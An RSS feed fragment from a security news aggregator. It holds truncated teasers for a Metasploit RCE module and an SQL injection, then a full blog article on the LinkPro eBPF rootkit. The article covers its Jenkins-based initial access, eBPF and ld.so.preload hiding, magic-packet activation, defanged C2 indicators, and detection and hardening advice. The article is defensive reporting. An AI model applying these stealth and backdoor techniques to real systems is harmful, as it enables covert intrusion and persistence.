href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vvveb CMS 1.0.5 Remote Code Execution]]></title>
<description><![CDATA[Topic: Vvveb CMS 1.0.5 Remote Code Execution Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></description>
<link>https://tsecurity.de/de/3059019/sicherheitsluecken/vvveb-cms-105-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3059019/sicherheitsluecken/vvveb-cms-105-remote-code-execution/</guid>
<pubDate>Fri, 24 Oct 2025 09:52:13 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: Vvveb CMS 1.0.5 Remote Code Execution Risk: High Text:##  # This module requires Metasploit: https://metasploit.com/download  # Current source: https://github.com/rapid7/metasploit-...]]></content:encoded>
</item>
<item>
<title><![CDATA[greenlife-Copyright©2025-Multiple-SQLi]]></title>
<description><![CDATA[Topic: greenlife-Copyright©2025-Multiple-SQLi Risk: Medium Text:# Titles: greenlife-Copyright©2025-Multiple-SQLi - Metasploit module - soon   # Author: nu11secur1ty  # Date: 10/06/2025  # Ve...]]></description>
<link>https://tsecurity.de/de/3053714/sicherheitsluecken/greenlife-copyright2025-multiple-sqli/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3053714/sicherheitsluecken/greenlife-copyright2025-multiple-sqli/</guid>
<pubDate>Tue, 21 Oct 2025 19:07:43 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Topic: greenlife-Copyright©2025-Multiple-SQLi Risk: Medium Text:# Titles: greenlife-Copyright©2025-Multiple-SQLi - Metasploit module - soon   # Author: nu11secur1ty  # Date: 10/06/2025  # Ve...]]></content:encoded>
</item>
<item>
<title><![CDATA[LinkPro Rootkit: New eBPF-Backed GNU/Linux Backdoor Found in Compromised AWS Environments]]></title>
<description><![CDATA[LinkPro Rootkit: New eBPF-Backed GNU/Linux Backdoor Found in Compromised AWS Environments
				
				
			
			
				
				
				
				
			
				
				
				
				
				
				
				
				
				
				
				
				 Post Views: 3
			
			
				
				
				
				
				



			
			
				
				
				
				
			
				
				
				
				
	...]]></description>
<link>https://tsecurity.de/de/3045989/it-security-nachrichten/linkpro-rootkit-new-ebpf-backed-gnulinux-backdoor-found-in-compromised-aws-environments/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3045989/it-security-nachrichten/linkpro-rootkit-new-ebpf-backed-gnulinux-backdoor-found-in-compromised-aws-environments/</guid>
<pubDate>Fri, 17 Oct 2025 10:35:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="et_pb_section et_pb_section_0 et_section_specialty">
				
				
				
				
				
				<div class="et_pb_row">
				<div class="et_pb_column et_pb_column_3_4 et_pb_column_0   et_pb_specialty_column  et_pb_css_mix_blend_mode_passthrough">
				
				
				
				
				<div class="et_pb_row_inner et_pb_row_inner_0">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_0 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_post_title et_pb_post_title_0 et_pb_bg_layout_light  et_pb_text_align_left">
				
				
				
				
				
				<div class="et_pb_title_container">
					<h1 class="entry-title">LinkPro Rootkit: New eBPF-Backed GNU/Linux Backdoor Found in Compromised AWS Environments</h1>
				</div>
				
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_1">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_1 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_0  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong><div class="post-views content-post post-286540 entry-meta load-static">
				<span class="post-views-icon dashicons dashicons-chart-bar"></span> <span class="post-views-label">Post Views:</span> <span class="post-views-count">3</span>
			</div></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_1  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><br>
<!-- News_Horizontal_smaller --><br>
<ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400"></ins><br>
</div>
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_2 patreon-row">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_2 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_2  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h3 class="premium-content">Join our <a class="green_color" href="https://www.patreon.com/posts/maximizing-your-87671900" target="_blank" rel="noopener sponsored">Patreon</a> Channel and Gain access to 70+ Exclusive Walkthrough Videos.</h3></div>
			</div><div class="et_pb_module et_pb_image et_pb_image_0">
				
				
				
				
				<a href="https://www.patreon.com/posts/create-evasive-111421720" target="_blank"><span class="et_pb_image_wrap "><img fetchpriority="high" decoding="async" width="800" height="120" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/02/Patreon-2.png" alt="Patreon" title="Patreon" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/02/Patreon-2.png 800w, https://www.blackhatethicalhacking.com/wp-content/uploads/2025/02/Patreon-2-480x72.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 800px, 100vw" class="wp-image-282931"></span></a>
			</div><div class="et_pb_module et_pb_divider et_pb_divider_0 et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_3">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_3 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_3  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner">Reading Time: 3 Minutes</div>
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_4">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_4 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_4  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2 data-start="617" data-end="644"><strong>Summary — what was found</strong></h2>
<p data-start="646" data-end="1403">Security researchers at <strong data-start="670" data-end="683">Synacktiv</strong> <a href="https://www.synacktiv.com/en/publications/linkpro-ebpf-rootkit-analysis" target="_blank" rel="noopener">investigated</a> a compromise of AWS-hosted infrastructure and uncovered a sophisticated GNU/Linux rootkit dubbed <strong data-start="794" data-end="805">LinkPro</strong>. The intruders gained initial access by exploiting an exposed <strong data-start="868" data-end="886">Jenkins server</strong> vulnerable to <a href="https://nvd.nist.gov/vuln/detail/cve-2024-23897" target="_blank" rel="noopener"><strong data-start="901" data-end="919">CVE-2024-23897</strong></a> and deployed a malicious Docker image (<code data-start="959" data-end="969">kvlnt/vv</code>, since removed) to multiple Kubernetes clusters. LinkPro is a Golang backdoor that achieves kernel-level stealth and flexible command-and-control (C2) by installing <strong data-start="1135" data-end="1155">two eBPF modules</strong> (Hide and Knock) and — when those fail — falling back to <code data-start="1213" data-end="1228">ld.so.preload</code> tricks via a bundled <code data-start="1250" data-end="1260">libld.so</code>. The backdoor supports both active (forward) and passive (reverse/knock-activated) modes and implements multiple transport protocols for C2.</p>
<p data-start="646" data-end="1403"><img decoding="async" class="aligncenter" src="https://www.synacktiv.com/sites/default/files/inline-images/knock_diagram.webp" alt="LinkPro Network Packet Processing" width="940" height="525"></p>
<hr data-start="1405" data-end="1408">
<h2 data-start="1410" data-end="1446"><strong>Initial access and delivery chain</strong></h2>
<p data-start="1448" data-end="1508">Synacktiv’s analysis shows the incident unfolded as follows:</p>
<ul>
<li data-start="1512" data-end="1612">Attackers abused an exposed <strong data-start="1540" data-end="1558">Jenkins server</strong> vulnerable to <strong data-start="1573" data-end="1591">CVE-2024-23897</strong> to get a foothold.</li>
<li data-start="1615" data-end="1726">They pushed a malicious Docker Hub image (<code data-start="1657" data-end="1667">kvlnt/vv</code>, Kali-based) onto Kubernetes nodes; the image contained:
<ul>
<li><code data-start="1731" data-end="1741">start.sh</code> — startup script that launches SSH and the payloads</li>
<li><code data-start="1800" data-end="1806">link</code> — an open-source VPN/proxy (vnt) used to provide remote proxy access via <code data-start="1880" data-end="1907">vnt.wherewego[.]top:29872</code></li>
<li><code data-start="1914" data-end="1919">app</code> — a Rust downloader (“vGet”) that fetches an encrypted <strong data-start="1975" data-end="1985">vShell</strong> payload from an S3 bucket and connects back to C2 (<code data-start="2037" data-end="2053">56.155.98[.]37</code>) over WebSocket</li>
</ul>
</li>
<li data-start="2074" data-end="2183">Additional payloads dropped to nodes included a second vShell backdoor and <strong data-start="2149" data-end="2160">LinkPro</strong>, the Golang rootkit.</li>
</ul>
<hr data-start="2185" data-end="2188">
<h2 data-start="2190" data-end="2221"><strong>LinkPro architecture &amp; modes</strong></h2>
<p data-start="2223" data-end="2271">LinkPro operates in <strong data-start="2243" data-end="2270">two complementary modes</strong>:</p>
<ul>
<li data-start="2275" data-end="2446"><strong data-start="2275" data-end="2301">Forward (active) mode:</strong> the implant directly initiates connections to the operator’s C2 using one of five supported protocols — <strong data-start="2406" data-end="2443">HTTP, WebSocket, UDP, TCP, or DNS</strong>.</li>
<li data-start="2449" data-end="3019"><strong data-start="2449" data-end="2484">Reverse (passive / knock) mode:</strong> LinkPro installs a <strong data-start="2504" data-end="2513">Knock</strong> eBPF module that monitors incoming TCP traffic for a “magic packet” (TCP packet with <strong data-start="2599" data-end="2622">window size = 54321</strong>). When detected, the Knock module saves the source IP and opens a one-hour window during which the operator can reach back to the host on an arbitrarily chosen port. The Knock module also rewrites packet headers (destination/source ports) to route operator packets to LinkPro’s internal listener (port <strong data-start="2925" data-end="2933">2333</strong>) while masking the original front-end firewall port — complicating log correlation.</li>
</ul>
<p data-start="3021" data-end="3267">Persistence is achieved by installing a <strong data-start="3061" data-end="3080">systemd service</strong>, and if eBPF module installation fails or is disabled, LinkPro will install a shared library <code data-start="3174" data-end="3184">libld.so</code> and add <code data-start="3193" data-end="3208">/etc/libld.so</code> to <strong data-start="3212" data-end="3234">/etc/ld.so.preload</strong> as a fallback stealth mechanism.</p>
<hr data-start="3269" data-end="3272">
<h2 data-start="3274" data-end="3318"><strong>Stealth mechanisms — eBPF + ld.so.preload</strong></h2>
<p data-start="3320" data-end="3371">LinkPro’s concealment is notable and multi-layered:</p>
<ul>
<li data-start="3375" data-end="3762"><strong data-start="3375" data-end="3396">Hide eBPF module:</strong> installs Tracepoint and Kretprobe eBPF programs that intercept system calls (e.g., <code data-start="3480" data-end="3490">getdents</code>) to hide files/processes and intercept <code data-start="3530" data-end="3539">sys_bpf</code> calls to hide BPF programs themselves. This enables kernel-level hiding without modifying kernel modules. (This technique requires kernel config <code data-start="3685" data-end="3713">CONFIG_BPF_KPROBE_OVERRIDE</code>; if absent, LinkPro uses the ld.so technique.)</li>
<li data-start="3765" data-end="3928"><strong data-start="3765" data-end="3787">Knock eBPF module:</strong> uses <strong data-start="3793" data-end="3800">XDP</strong> and <strong data-start="3805" data-end="3811">TC</strong> eBPF programs to detect and manipulate packets for the magic-packet activation and to rewrite ports transparently.</li>
<li data-start="3931" data-end="4360"><strong data-start="3931" data-end="3965">/etc/ld.so.preload + libld.so:</strong> the fallback injects <code data-start="3987" data-end="3997">libld.so</code> via <code data-start="4002" data-end="4017">ld.so.preload</code> so the library is loaded into all dynamically linked processes (e.g., <code data-start="4088" data-end="4101">/usr/bin/ls</code>). <code data-start="4104" data-end="4114">libld.so</code> hooks libc functions to modify outputs (file lists, process listings, network sockets) so user-mode tools do not reveal the rootkit. On signal-based shutdowns (SIGHUP, SIGINT, SIGTERM) LinkPro removes eBPF modules and restores <code data-start="4342" data-end="4357">ld.so.preload</code>.</li>
</ul>
<hr data-start="4362" data-end="4365">
<h2 data-start="4367" data-end="4404"><strong>Capabilities and operator features</strong></h2>
<p data-start="4406" data-end="4471">LinkPro provides a compact but powerful command set to operators:</p>
<ul>
<li data-start="4475" data-end="4531">Spawn interactive shells (<code data-start="4501" data-end="4512">/bin/bash</code> in a pseudo-TTY)</li>
<li data-start="4534" data-end="4568">Execute arbitrary shell commands</li>
<li data-start="4571" data-end="4633">Enumerate files and directories, perform file I/O operations</li>
<li data-start="4636" data-end="4697">Download files to the host from attacker-controlled sources</li>
<li data-start="4700" data-end="4793">Establish SOCKS5 proxy tunnels for pivoting and proxying traffic through the compromised host</li>
</ul>
<p data-start="4795" data-end="4979">The initial deployment chain also included a <strong data-start="4840" data-end="4857">vnt VPN/proxy</strong> component and a Rust downloader that fetched vShell payloads from cloud storage and established WebSocket C2 connections.</p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_5 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><strong>See Also: So, you want to be a hacker?<br>
</strong><strong><a href="https://www.blackhatethicalhacking.com/courses/" target="_blank" rel="noopener noreferrer">Offensive Security, Bug Bounty Courses</a></strong></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_6  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><br>
<!-- News_Horizontal_smaller --><br>
<ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400"></ins><br>
</div>
			</div><div class="et_pb_module et_pb_text et_pb_text_7  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h4><span><strong>Discover your weakest link. Be proactive, not reactive. Cybercriminals need just one flaw to strike.</strong></span></h4>
<p><a href="https://www.blackhatethicalhacking.com/solutions/"><img decoding="async" class="alignnone wp-image-276050 size-full" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/11/Solutions.png" alt="" width="800" height="120" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/11/Solutions.png 800w, https://www.blackhatethicalhacking.com/wp-content/uploads/2023/11/Solutions-480x72.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 800px, 100vw"></a></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_8  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2 data-start="4986" data-end="5018"><strong>Network &amp; operational evasion</strong></h2>
<p data-start="5020" data-end="5085">Synacktiv highlights two operational evasion points worth noting:</p>
<ol>
<li data-start="5090" data-end="5256"><strong data-start="5090" data-end="5134">Magic-packet activation + port rewriting</strong> — allows operator access via allowed firewall ports and obfuscates correlation across perimeter logs and host activity.</li>
<li data-start="5260" data-end="5488"><strong data-start="5260" data-end="5280">BPF-based hiding</strong> — conceals file and process artifacts at the kernel level and can intercept logging or tracing attempts; when kernel features aren’t available, the ld.so technique hides artifacts at userland via libc hooks.</li>
</ol>
<hr data-start="5490" data-end="5493">
<h2 data-start="5495" data-end="5526"><strong>Indicators (from the report)</strong></h2>
<p data-start="5528" data-end="5619">Examples extracted from Synacktiv’s findings — treat these as starting points for triage.</p>
<ul>
<li data-start="5623" data-end="5685">Malicious Docker image: <code data-start="5647" data-end="5657">kvlnt/vv</code> (removed from Docker Hub)</li>
<li data-start="5688" data-end="5735">VPN/proxy domain: <code data-start="5706" data-end="5733">vnt.wherewego[.]top:29872</code></li>
<li data-start="5738" data-end="5773">C2 WebSocket IP: <code data-start="5755" data-end="5771">56.155.98[.]37</code></li>
<li data-start="5776" data-end="5846">Files observed in image: <code data-start="5801" data-end="5811">start.sh</code>, <code data-start="5813" data-end="5819">link</code>, <code data-start="5821" data-end="5826">app</code> (vGet downloader)</li>
<li data-start="5849" data-end="5963">LinkPro artifacts: <code data-start="5868" data-end="5878">libld.so</code> (path installed via <code data-start="5899" data-end="5919">/etc/ld.so.preload</code>), systemd service entries for persistence</li>
<li data-start="5966" data-end="6082">LinkPro listening port: <strong data-start="5990" data-end="5998">2333</strong> (internal) and proxied port experiments with <strong data-start="6044" data-end="6052">2233</strong> used in header translations</li>
<li data-start="6085" data-end="6183">Kernel config of interest: <code data-start="6112" data-end="6140">CONFIG_BPF_KPROBE_OVERRIDE</code> (required for certain BPF hiding features)</li>
</ul>
<blockquote data-start="6185" data-end="6345">
<p data-start="6187" data-end="6345">Note: organizations should treat these IoCs as sensitive and combine them with their own telemetry. IPs/domains in attacker infrastructure can change quickly.</p>
</blockquote></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_9 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/articles/integrating-metasploit-with-beef-framework-for-advanced-post-exploitation-attacks/" target="_blank" rel="noopener noreferrer">Integrating Metasploit with BeEF Framework for advanced post-exploitation attacks<br>
</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_10  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><br>
<!-- News Adsense Adcode Horizontal --><br>
<ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400"></ins><br>
</div>
			</div><div class="et_pb_module et_pb_text et_pb_text_11 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/tools/formpoison/" target="_blank" rel="noopener">Offensive Security Tool: FormPoison</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_12  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="flex-shrink-0 flex flex-col relative items-end">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="flex-shrink-0 flex flex-col relative items-end">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="flex-shrink-0 flex flex-col relative items-end">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="flex-shrink-0 flex flex-col relative items-end">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<h2 data-start="6352" data-end="6395"><strong>Detection and incident response guidance</strong></h2>
<p data-start="6397" data-end="6560">Because LinkPro strives for kernel- and userland-level stealth, defenders should use diverse telemetry sources and assume user-space tools alone may be unreliable:</p>
<p data-start="6562" data-end="6588"><strong data-start="6562" data-end="6588">Immediate triage steps</strong></p>
<ul>
<li data-start="6591" data-end="6666">Isolate affected hosts and snapshot memory + disks for forensic analysis.</li>
<li data-start="6669" data-end="6824">Look for unexpected systemd services; check <code data-start="6713" data-end="6733">/etc/ld.so.preload</code> for unexpected entries and validate integrity of <code data-start="6783" data-end="6799">/lib/ld-linux*</code> and related libraries.</li>
<li data-start="6827" data-end="6905">Search for <code data-start="6838" data-end="6848">libld.so</code> and other unexpected shared libraries in system paths.</li>
<li data-start="6908" data-end="7048">Inspect container images running on clusters for <code data-start="6957" data-end="6967">kvlnt/vv</code> or unknown images; review recent image pulls and Kubernetes deployment events.</li>
<li data-start="7051" data-end="7224">Correlate front-end firewall logs for inbound traffic showing unusual port mappings around the magic packet heuristics (unusual TCP window size 54321 may be an indicator).</li>
</ul>
<p data-start="7226" data-end="7259"><strong data-start="7226" data-end="7259">Hunting for BPF-based stealth</strong></p>
<ul>
<li data-start="7262" data-end="7573">Query kernel BPF program lists (<code data-start="7294" data-end="7308">bpftool prog</code>) on hosts (requires privileged access) and compare to a known-good baseline — note that LinkPro attempts to hide BPF programs, so this check should be performed from a trusted, forensic environment or offline snapshot where the attacker’s hooks cannot interfere.</li>
<li data-start="7576" data-end="7652">Check kernel audit logs and dmesg for BPF program loads or XDP/TC changes.</li>
<li data-start="7655" data-end="7828">Use out-of-band monitoring (hypervisor/container runtime, host logs forwarded to remote SIEM) to detect discrepancies between process lists and observed sockets/connections.</li>
</ul>
<p data-start="7830" data-end="7859"><strong data-start="7830" data-end="7859">Containment &amp; remediation</strong></p>
<ul>
<li data-start="7862" data-end="8075">Revoke credentials that gave initial access (Jenkins service accounts, compromised VPN credentials, over-privileged AD service accounts). Rotate keys and tokens discovered in compromised repositories or configs.</li>
<li data-start="8078" data-end="8224">Rebuild compromised hosts from known-good images after wiping; do not rely on in-place cleanup if persistent kernel or loader hooks were active.</li>
<li data-start="8227" data-end="8365">Remove any malicious container images from registries and audit CI/CD pipelines and image build/deploy workflows for supply-chain abuse.</li>
<li data-start="8368" data-end="8529">If BPF programs were used and kernel integrity is suspect, update/reboot kernels and ensure kernel modules and configuration are restored from trusted sources.</li>
<li data-start="8532" data-end="8618">Rotate all credentials (SSH keys, API keys, cloud roles) that may have been exposed.</li>
</ul>
<hr data-start="8620" data-end="8623">
<h2 data-start="8625" data-end="8667"><strong>Mitigations &amp; hardening recommendations</strong></h2>
<ul>
<li data-start="8671" data-end="8819"><strong data-start="8671" data-end="8708">Patch and harden CI/CD endpoints:</strong> close or patch exposed Jenkins instances (CVE-2024-23897) and limit unauthenticated access to build systems.</li>
<li data-start="8822" data-end="8984"><strong data-start="8822" data-end="8874">Harden container registries and image pipelines:</strong> enforce image signing, scanning, and least-privilege deployment; restrict ability to pull arbitrary images.</li>
<li data-start="8987" data-end="9130"><strong data-start="8987" data-end="9018">Harden Kubernetes clusters:</strong> use network segmentation, Pod Security Policies / OPA/Gatekeeper, restrict node access, and audit RBAC roles.</li>
<li data-start="9133" data-end="9287"><strong data-start="9133" data-end="9166">Egress and firewall policies:</strong> enforce strict egress rules and log all NATed connections; consider TLS inspection where feasible to detect covert C2.</li>
<li data-start="9290" data-end="9428"><strong data-start="9290" data-end="9309">BPF visibility:</strong> enable centralized kernel telemetry where possible and integrate BPF program load events into SIEM/wider monitoring.</li>
<li data-start="9431" data-end="9536"><strong data-start="9431" data-end="9460">Immutable infrastructure:</strong> prefer rebuild-over-fix for systems suspected of kernel-level compromise.</li>
<li data-start="9539" data-end="9654"><strong data-start="9539" data-end="9562">Credential hygiene:</strong> remove over-privileged service accounts, apply JIT/JEA, and rotate keys after compromise.</li>
<li data-start="9657" data-end="9728"><strong data-start="9657" data-end="9679">Backup &amp; recovery:</strong> ensure backups are offline/immutable and tested.</li>
</ul>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_13 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/news/redis-fixes-13-year-old-cvss-10-0-redishell-bug-allowing-remote-code-execution/" target="_blank" rel="noopener noreferrer">Redis Fixes 13-Year-Old CVSS 10.0 “RediShell” Bug Allowing Remote Code Execution</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_14  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><blockquote><p><em>Are u a security researcher? Or a company that writes articles about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing? </em><em>If you want to express your idea in an article contact us here for a quote: <strong>info@blackhatethicalhacking.com</strong></em></p></blockquote></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_15  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong><em>Source: bleepingcomputer.com, synacktiv.com</em></strong></p>
<p><strong>Source Links:</strong><br><a href="https://www.synacktiv.com/en/publications/linkpro-ebpf-rootkit-analysis" target="_blank" rel="noopener"><strong>S<em>ynacktiv</em></strong></a><br><a href="https://thehackernews.com/2025/10/linkpro-linux-rootkit-uses-ebpf-to-hide.html" target="_blank" rel="noopener"><strong>Thehackernews</strong></a></p>
<p> </p></div>
			</div><div class="et_pb_module et_pb_divider et_pb_divider_1 et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div><div class="et_pb_module et_pb_image et_pb_image_1 store-img">
				
				
				
				
				<a href="https://store.blackhatethicalhacking.com/" target="_blank"><span class="et_pb_image_wrap "><img decoding="async" width="1142" height="500" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store.png" alt="Merch" title="Store" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store.png 1142w, https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store-980x429.png 980w, https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store-480x210.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 1142px, 100vw" class="wp-image-271829"></span></a>
			</div><div class=" et_pb_logo_slider  et_pb_logo_slider_0 ">
                
            </div>
			</div>
				
				
				
				
			</div>
			</div><div class="et_pb_column et_pb_column_1_4 et_pb_column_1    et_pb_css_mix_blend_mode_passthrough">
				
				
				
				
				<div class="et_pb_module et_pb_sidebar_0 news-sidebar1 et_pb_widget_area clearfix et_pb_widget_area_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_widget rpwe_widget recent-posts-extended"><h4 class="widgettitle">Recent News</h4><div class="rpwe-block news-recent-posts-sb"><ul class="rpwe-ul"><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/pixnapping-new-android-side-channel-steals-2fa-codes-pixel-by-pixel/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/10/877x440-Images-for-the-News-posts-33-300x150.png" alt="Pixnapping: New Android Side-Channel Steals 2FA Codes Pixel-by-Pixel" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/pixnapping-new-android-side-channel-steals-2fa-codes-pixel-by-pixel/" target="_self">Pixnapping: New Android Side-Channel Steals 2FA Codes Pixel-by-Pixel</a></h3><time class="rpwe-time published" datetime="2025-10-15T10:38:24+02:00">October 15, 2025</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/chaosbot-rust-backdoor-uses-discord-c2-chaos-ransomware-adds-destructive-clipboard-hijack-features/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/10/877x440-Images-for-the-News-posts-32-300x150.png" alt="ChaosBot: Rust Backdoor Uses Discord C2 — Chaos Ransomware Adds Destructive &amp; Clipboard-Hijack Features" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/chaosbot-rust-backdoor-uses-discord-c2-chaos-ransomware-adds-destructive-clipboard-hijack-features/" target="_self">ChaosBot: Rust Backdoor Uses Discord C2 — Chaos Ransomware Adds Destructive &amp; Clipboard-Hijack Features</a></h3><time class="rpwe-time published" datetime="2025-10-13T10:26:28+02:00">October 13, 2025</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/redis-fixes-13-year-old-cvss-10-0-redishell-bug-allowing-remote-code-execution/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/10/877x440-Images-for-the-News-posts-31-300x150.png" alt="Redis Fixes 13-Year-Old CVSS 10.0 “RediShell” Bug Allowing Remote Code Execution" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/redis-fixes-13-year-old-cvss-10-0-redishell-bug-allowing-remote-code-execution/" target="_self">Redis Fixes 13-Year-Old CVSS 10.0 “RediShell” Bug Allowing Remote Code Execution</a></h3><time class="rpwe-time published" datetime="2025-10-07T11:48:42+02:00">October 7, 2025</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/crimson-collective-claims-red-hat-gitlab-breach-570gb-data-stolen/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/10/877x440-Images-for-the-News-posts-29-300x150.png" alt="Crimson Collective 